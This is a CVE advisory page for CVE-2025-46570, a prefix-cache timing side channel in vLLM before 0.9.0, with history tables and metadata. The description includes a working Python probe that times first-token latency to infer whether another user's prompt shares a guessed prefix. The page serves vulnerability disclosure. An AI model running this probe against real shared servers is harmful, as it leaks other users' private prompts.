vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PagedAttention mechanism finds a cached chunk matching the prompt's prefix, the prefill phase is accelerated, and the speedup is reflected in the TTFT (Time to First Token). These timing differences caused by cache hits are significant enough to be measured and exploited as a timing side channel (CWE-208), allowing an attacker to infer whether another user's prompt shares a prefix with their own. This issue has been patched in version 0.9.0.
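To make the observable discrepancy concrete, below is a minimal probe sketch, assuming a vLLM server exposing its standard OpenAI-compatible completions API at a hypothetical http://localhost:8000 with a placeholder model name. It streams a single-token completion and times how long the first token takes to arrive, which is exactly the TTFT signal the side channel leaks through.

```python
import time
import requests

# Hypothetical endpoint and model name; adjust for the server under test.
VLLM_URL = "http://localhost:8000/v1/completions"
MODEL = "my-model"

def measure_ttft(prompt: str) -> float:
    """Stream a one-token completion and return the time to first token."""
    start = time.monotonic()
    with requests.post(
        VLLM_URL,
        json={"model": MODEL, "prompt": prompt, "max_tokens": 1, "stream": True},
        stream=True,
        timeout=30,
    ) as resp:
        resp.raise_for_status()
        for line in resp.iter_lines():
            if line:  # the first server-sent event carries the first token
                return time.monotonic() - start
    raise RuntimeError("stream ended before a token arrived")

# On vulnerable versions (< 0.9.0), a prompt whose prefix is already in the
# prefix cache skips part of prefill, so its TTFT is measurably lower than
# that of a cold prompt of comparable length.
cold = measure_ttft("an arbitrary prompt with no cached prefix, padded out")
warm = measure_ttft("a guessed prefix that another tenant may have submitted")
print(f"cold TTFT: {cold:.4f} s, warm TTFT: {warm:.4f} s")
```

Comparing the two measurements over repeated trials, a consistently lower TTFT for the probed prompt would indicate a prefix-cache hit; on a patched server (0.9.0 or later) the two distributions should no longer be distinguishable.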
History
Tue, 24 Jun 2025 19:00:00 +0000
Type | Values Removed | Values Added |
---|---|---|
First Time appeared | | Vllm, Vllm vllm |
Weaknesses | | CWE-203 |
CPEs | | cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* |
Vendors & Products | | Vllm, Vllm vllm |
Fri, 30 May 2025 21:45:00 +0000
Type | Values Removed | Values Added |
---|---|---|
References | | |
Metrics | threat_severity | threat_severity |
Thu, 29 May 2025 18:15:00 +0000
Type | Values Removed | Values Added |
---|---|---|
Metrics | | ssvc |
Thu, 29 May 2025 16:45:00 +0000
Type | Values Removed | Values Added |
---|---|---|
Description | | vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0. |
Title | | vLLM’s Chunk-Based Prefix Caching Vulnerable to Potential Timing Side-Channel |
Weaknesses | | CWE-208 |
References | | |
Metrics | | cvssV3_1 |

Status: PUBLISHED
Assigner: GitHub_M
Published:
Updated: 2025-05-29T18:05:10.768Z
Reserved: 2025-04-24T21:10:48.175Z
Link: CVE-2025-46570


Status: Analyzed
Published: 2025-05-29T17:15:21.327
Modified: 2025-06-24T18:25:31.883
Link: CVE-2025-46570
